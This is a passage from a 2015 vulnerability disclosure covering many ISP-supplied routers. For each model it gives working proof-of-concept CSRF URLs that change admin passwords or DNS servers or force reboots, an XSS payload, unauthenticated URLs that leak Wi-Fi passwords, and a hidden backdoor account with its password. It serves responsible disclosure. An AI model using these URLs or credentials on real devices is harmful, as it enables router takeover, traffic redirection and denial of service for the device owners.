#19. - Cross Site Request Forgery (CSRF) on #1, #2, #3, #5, #10, #12, #13, #14, #15, #16, #18 and #20. - Denial of Service (DoS) on #1, #5 and #10. - Privilege Escalation on #1. - Information Disclosure on #4 and #11. - Backdoor on #10. - Bypass Authentication using SMB Symlinks on #12. - USB Device Bypass Authentication on #12, #13, #14 and #15. - Bypass Authentication on #13 and #14. - Universal Plug and Play related vulnerabilities on #2, #3, #4, #5, #6, #7, #10, #11, #12, #13, #14, #16, #21 and #22. CVEs have already been requested to MITRE and other CNAs (since MITRE is taking forever to assign a CVE) and we are waiting for response. OSVDB IDs have been assigned. Vendors and manufacturers have already been reported. All routers have been physically tested. ============================================================================================ Manufacturer: Observa Telecom Model: AW4062 Tested firmwares: 1.3.5.18 and 1.4.2 (latest) Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL customers specially during 2012. -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Multiple Cross-site Scriptings (XSS) found into the configuration menu within the router front-web. These XSS give an attacker the opportunity to execute malicious scripts. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121211 (http://osvdb.org/show/osvdb/121211) * PoC: The threat is found inside some entry inputs that let special characters to be written in and show the added information into the web itself. I.e., there’s a vulnerable input field within the subdirectory Domain Blocking. When used legitimately, this input is used to block the traffic between the router and some particular domains. The script will remain stored (persistent XSS) into the field Domain from the Domain Block Table and it will be executed each time the victim access to the Domain Blocking subdirectory. This vulnerability can also be found within the input fields that belong to other subdirectories like Firewall/URL Blocking, Firewall/Port Forwarding, Services/DNS/Dynamic DNS and Advance/SNMP, between others. The most effective attack is found inside the Advance/SNMP subdirectory. By injecting the script into the System Name field, the malicious code will be executed each time someone connects to the router because the script is reflected into the home page. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121210 (http://osvdb.org/show/osvdb/121210), OSVDB-121212 (http://osvdb.org/show/osvdb/121212) and OSVDB-121214 (http://osvdb.org/show/osvdb/121214) * PoC: I.e., if an attacker wants the victim to ping a certain IP address in order to check whether the victim is already logged into the router, he will send this URL to the victim: http://192.168.1.1/goform/formPing?pingAddr=37.252.96.88 It is also possible for an attacker to change the default router password by sending the victim this URL: http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234&newpass=12345&confpass=12345&save=%22Apply%20Changes%22 The URL above forces the user with index 0 (it is always going to be the user named 1234) to change his default password from 1234 to 12345. The following URL forces the victim to change his DNS servers to those the attacker wants to. http://192.168.1.1/goform/formDNS?dnsMode=dnsManual&dns1=37.252.96.88&dns2=&dns3= Any action which is available within the website can be attacked through CSRF. This includes opening ports, changing the DHCP and NTP servers, modifying the Wireless Access point, enabling WPS, etc. -------------------------------------------------------------------------------------------- ---------------------------------- Privilege Escalation ---------------------------------- * Description: Any user without administrator rights is able to carry out a privilege escalation by reading the public router configuration file (config.xml). This file stores each of the router configuration parameters, including the credentials from all users in plain text. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121213 (http://osvdb.org/show/osvdb/121213) and OSVDB-121285 (http://osvdb.org/show/osvdb/121285) * PoC: An user without administrator rights (i.e., user), connects to the router through FTP. This user is able to get both /etc/passwd and config.xml files. The file config.xml stores each of the router configuration parameters in plain text, including the credentials from all users. Doing so, any user is able to gain administrator privileges. This is critical because not too many people know there is another user apart from the administrator one. That means they only change the administrator password, leaving a default user with default credentials (user:user) being able to escalate privileges. -------------------------------------------------------------------------------------------- ------------------------------------ Denial of Service ----------------------------------- * Description: An attacker is able to carry out an external Denial of Service attack * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. * PoC: It is possible for an attacker to carry out a Denial of Service attack through CSRF: http://192.168.1.1/goform/admin/formReboot If a victim opens this URL, router commits all the information and reboots in a process that takes 60 seconds long. There are tons of ways for an attacker to do a Denial of Service attack by exploiting Cross Site Request Forgery vulnerabilities: a) Establish new firewall rules in order to block certain URLs, IPs or MACs. Even setting up a global Deny order is possible and only allowing traffic from/to certain IPs/MAcs. Delete the router configuration that allows itself to connect to the Internet Service Provider. c) Disable the Wireless Interface so no device can be connected through the 802.11 protocol. d) Etc. ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: WAP-5813n (tested in Product Numbers 723306-104 and 723306-033) Tested firmwares: P401-402TLF-C02_R35 and P401-402TLF-C04_R09 (latest one) Comments: Common router that Spanish ISP Telefónica used to give away to their FTTH customers from 2011 to 2014 -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless>Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless>Security and Wireless>MAC Filter subdirectories. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and OSVDB-121217 (http://osvdb.org/show/osvdb/121217) * PoC: Every input field is vulnerable to CSRF. Whenever the administrator user changes his password, he is actually opening the URL: /password.cgi?adminPassword=newpassword. An attacker may send the following URL to the victim, so the administrator password will be changed to 1234567890: http://192.168.1.1/password.cgi?adminPassword=1234567890 If an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.252.96.88&dnsSecondary=37.252.96.89&dnsIfc=&dnsRefresh=1 -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122383 (http://osvdb.org/show/osvdb/122383) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: CT-5365 Tested firmwares: A111-306TKF-C02_R16 Comments: Common router that Spanish ISP Telefónica used to give away to their FTTH customers since 2012 -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless>Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless>Security and Wireless>MAC Filter subdirectories. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and OSVDB-121217 (http://osvdb.org/show/osvdb/121217) * PoC: Every input field is vulnerable to CSRF. Whenever the administrator user changes his password, he is actually opening the URL: /password.cgi?sysPassword=newpassword. An attacker may send the following URL to the victim, so the administrator password will be changed to 1234567890: http://192.168.1.1/password.cgi?sysPassword=1234567890 If an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.56.61.35.88&dnsSecondary=80.58.61.34&dnsDinamic=0&dnsRefresh=1 -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121215 (http://osvdb.org/show/osvdb/121215) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the Connected Clients list (Device Info -> DHCP). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122383 (http://osvdb.org/show/osvdb/122383) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: D-Link Model: DSL-2750B Tested firmwares: EU_1.01 Comments: -------------------------------------------------------------------------------------------- ------------------ Information Disclosure (Insecure Object References) ------------------- * Description: An attacker is able to obtain critical information without being logged in. * Report status: Reported to MITRE on 2015-03-25. Waiting for assignation. OSVDB-121219 (http://osvdb.org/show/osvdb/121219) * PoC: By accessing the URL http://192.168.1.1/hidden_info.html, browser shows huge amount of parameters such as SSID, Wi-Fi password, PIN code, etc. without requiring any login process. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122384 (http://osvdb.org/show/osvdb/122384) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Belkin Model: F5D7632-4 Tested firmwares: 6.01.04 Comments: -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out malicious actions. * Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121220 (http://osvdb.org/show/osvdb/121220) * PoC: Every input field is vulnerable to CSRF. I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so: http://192.168.2.1/cgi-bin/setup_dns.exe?page="setup_dns"&logout=""&dns1_1=37&dns1_2=252 &dns1_3=96&dns1_4=88&dns2_1=37&dns2_2=252&dns2_3=96&dns2_4=89 -------------------------------------------------------------------------------------------- ------------------------------------ Denial of Service ----------------------------------- * Description: An attacker is able to carry out an external Denial of Service attack. * Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation. * PoC: It is possible for an attacker to carry out a Denial of Service attack through CSRF: http://192.168.2.1/cgi-bin/restart.exe?page="tools_gateway"&logout="" This URL causes the router to reboot, interrupting any active connection and denying the service for about 20 seconds. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122389 (http://osvdb.org/show/osvdb/122389) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Sagem Model: LiveBox 2 Pro Tested firmwares: FAST3yyy_671288 Comments: Common router that ISP Orange used to give away to their ADSL customers. -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code, even if the victim is not logged into the router web-config page. * Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121223 (http://osvdb.org/show/osvdb/121223) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. 1. The SSID field within the “Configuración-> Equipos -> Personalizar” (Configuration->Devices->Personalize) subdirectory allows script code injection. The script execution can be clearly seen within the “Configuración-> Equipos -> Mostrar” (Configuration->Devices->Show) subdirectory. 2. The SSID field within the “Configuración-> LiveBox-> Configuracion Wifi -> SSID-name” (Configuration->LiveBox->Wi-Fi Configuration->SSID-Name) subdirectory allows script code injection. The script execution can be clearly seen within the main log-in webpage, even if the user is not logged in. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122387 (http://osvdb.org/show/osvdb/122387) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Amper Model: Xavi 7968 and Xavi 7968+ Tested firmwares: 3.01APT94 (latest one) Comments: Common router that ISP Telefónica used to give away to their ADSL customers from 2010 to 2013. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121224 (http://osvdb.org/show/osvdb/121224) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the Connected Clients list (/webconfig/status/dhcp_table.html). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify the WPS configuration by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122388 (http://osvdb.org/show/osvdb/122388) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the WPS configuration or resetting the AP to default settings. ============================================================================================ ============================================================================================ Manufacturer: Sagem Model: Fast 1201 Tested firmwares: 3.01APT94 (latest one) Comments: - -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121222 (http://osvdb.org/show/osvdb/121222) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the DHCP Leases list (dhcpinfo.html). Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Linksys Model: WRT54GL Tested firmwares: 4.30.16 build 6 Comments: - -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121221 (http://osvdb.org/show/osvdb/121221) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the Connected Clients list (DHCPTable.asp). It can be accessed either directly through the URL or through the Status-> Local Network -> DHCP Clients Table subdirectories. Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Observa Telecom Model: RTA01N Tested firmwares: RTK_V2.2.13 Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL/VDSL customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Multiple Cross-site Scriptings (XSS) found into the configuration menu within the router front-web. These XSS give an attacker the opportunity to execute malicious scripts. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121787 (http://osvdb.org/show/osvdb/121787) and OSVDB-121788 (http://osvdb.org/show/osvdb/121788) * PoC: The threat is found inside some entry inputs that let special characters to be written in and show the added information into the web itself. I.e., Nombre del host (Hostname) input field within the subdirectory Servicio -> DDNS (Service -> DDNS or /ddns.htm) is vulnerable. There is another vulnerable input field within the Mantenimiento -> Contraseña (Maintenance -> Password or /userconfig.htm) subdirectory. After creating a user whose username contains the malicious script, it is stored into the User Accounts table and executes once the victim accesses this subdirectory. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121786 (http://osvdb.org/show/osvdb/121786) * PoC: I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/form2Dns.cgi?dnsMode="1"&dns1="37.252.96.88"&dns2="37.252.96.89"&dns3=""&submit.htm?dns.htm="Send"&save="Aplicar cambios" It is also possible for an attacker to change the default router administrator password by sending the victim this URL: http://192.168.1.1/form2userconfig.cgi?username="1234"&privilege=2&oldpass="1234"&newpass="newpass"&confpass="newpass"&modify="Modificar"&select="s0"&hiddenpass="1234"&submit.htm?userconfig.htm="Send" The URL above forces the administrator user (it is always going to be the user named 1234) to change his default password from 1234 to newpass. -------------------------------------------------------------------------------------------- ------------------------------------ Denial of Service ----------------------------------- * Description: An attacker is able to carry out an external Denial of Service attack * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. * PoC: It is possible for an attacker to carry out a Denial of Service attack through CSRF: http://192.168.1.1/form2Reboot.cgi?rebootMode=0&reboot="Reiniciar"&submit.htm?reboot.htm="Send" If a victim opens this URL, router replies with HTTP 200 OK status code and reboots. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121789 (http://osvdb.org/show/osvdb/121789) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the DHCP Active Clients table (/dhcptbl.html). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- ----------------------------------------- Backdoor --------------------------------------- * Description: There is a second default administrator user who is hidden to the legitimate router owner. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121785 (http://osvdb.org/show/osvdb/121785) * PoC: In addition to the well-known 1234 administrator user, there is another one named admin, whose password is 7449airocon. This superuser remains hidden (it does only appear into the backup configuration XML file) and is able to modify any configuration settings either through the web interface or through telnet. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules, carry out a persistent denial of service and obtain the WLAN passwords, between other things, by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122386 (http://osvdb.org/show/osvdb/122386) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. It is also possible for an attacker to change the WPS configuration settings, reset the AP to the default ones and obtain critical information, such as WLAN passwords. ============================================================================================ ============================================================================================ Manufacturer: Observa Telecom Model: Home Station BHS-RTA Tested firmwares: v1.1.3 Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL/VDSL customers -------------------------------------------------------------------------------------------- --------------------------------- Information Disclosure --------------------------------- * Description: Observa Telecom Home Station BHS-RTA web interface allows an external attacker to obtain critical information without login process. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121781 (http://osvdb.org/show/osvdb/121781), OSVDB-121782 (http://osvdb.org/show/osvdb/121782), OSVDB-121783 (http://osvdb.org/show/osvdb/121783) and OSVDB-121784 (http://osvdb.org/show/osvdb/121784) * PoC: Without requiring any login process, an external attacker is able to obtain critical information such as the WLAN password and settings, the Internet configuration, a list of connected clients, etc. By accessing the following URL, browser shows WLAN configuration, including the passwords: http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101 By accessing the following URL, browser shows a list of connected clients, including their IP and MAC addresses: http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101 By accessing the following URL, browser shows the Internet configuration parameters: http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=returnInternetJSON.txt&_=1430086980134 By accessing the following URL, browser shows whether the administrator password has been changed or is the default one. http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnPasswordJSON.txt&var:page=returnPasswordJSON.txt&_=1430086980134 -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122386 (http://osvdb.org/show/osvdb/122386) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Observa Telecom Model: VH4032N Tested firmwares: VH4032N_V0.2.35 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121793 (http://osvdb.org/show/osvdb/121793) * PoC: The threat is found inside some entry inputs that let special characters to be written in and show the added information into the web itself. I.e, the SSID input field is vulnerable if the following code is written in: ‘; </script><script>alert(1)</script><script>// The malicious code will be executed throughout the whole web interface. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121791 (http://osvdb.org/show/osvdb/121791) and OSVDB-121792 (http://osvdb.org/show/osvdb/121792) * PoC: Although the existence of a token related to session ID, configuration settings can be modified without the need of it. Thus, every input field is vulnerable to CSRF attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.0.1/en_US/administration.cgi?usrPassword=newpass If an attacker wants to change the FTP server configuration settings, such as the password and the allowance of remote FTP WAN connections, he may use the following link: http://192.168.0.1/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword=vulnpass&ftpPort=21&ftpAclMode=2 -------------------------------------------------------------------------------------------- ------------------------ Bypass Authentication using SMB Symlinks ------------------------ * Description: An external attacker, without requiring any login process, is able to download the whole router kernel filesystem, including all the configuration information and the user account information files, by creating symbolic links through the router Samba server. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121790 (http://osvdb.org/show/osvdb/121790) * PoC: An unauthenticated attacker is able to download the whole router filesystem by connecting to the Samba server. There is a shared service (called storage) in which it is possible to create symbolic links to the router filesystem and download the content. I.e., a symlink to / is possible and allows the attacker to freely view and download the entire filesystem. -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121794 (http://osvdb.org/show/osvdb/121794) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify the WPS configuration by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122386 (http://osvdb.org/show/osvdb/122386) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the WPS configuration or resetting the AP to default settings. ============================================================================================ ============================================================================================ Manufacturer: Huawei Model: HG553 Tested firmwares: V100R001C03B043SP01 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121778 (http://osvdb.org/show/osvdb/121778) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- --------------------------------- Bypass Authentication ---------------------------------- * Description: An external attacker, without requiring any login process, is able to reset the router settings to default ones besides bringing a permanent denial of service attack on. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121779 (http://osvdb.org/show/osvdb/121779) * PoC: Without requiring any login process, an attacker is able to bring on a permanent denial of service by constantly accessing the /rebootinfo.cgi URL. The attacker is also able to force the router to reset to default configuration settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router by using the default credentials. In both attacks, router replies with HTTP 400 status code, but either the reboot or the configuration reset is being correctly executed. -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121776 (http://osvdb.org/show/osvdb/121776) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the WiFi->Básico (WiFi->Basic) subdirectory allows script code injection. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121775 (http://osvdb.org/show/osvdb/121775) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.0.1/userpasswd.cgi?usrPassword=newpassword -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122385 (http://osvdb.org/show/osvdb/122385) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Huawei Model: HG556a Tested firmwares: V100R001C10B077 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121778 (http://osvdb.org/show/osvdb/121778) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- --------------------------------- Bypass Authentication ---------------------------------- * Description: An external 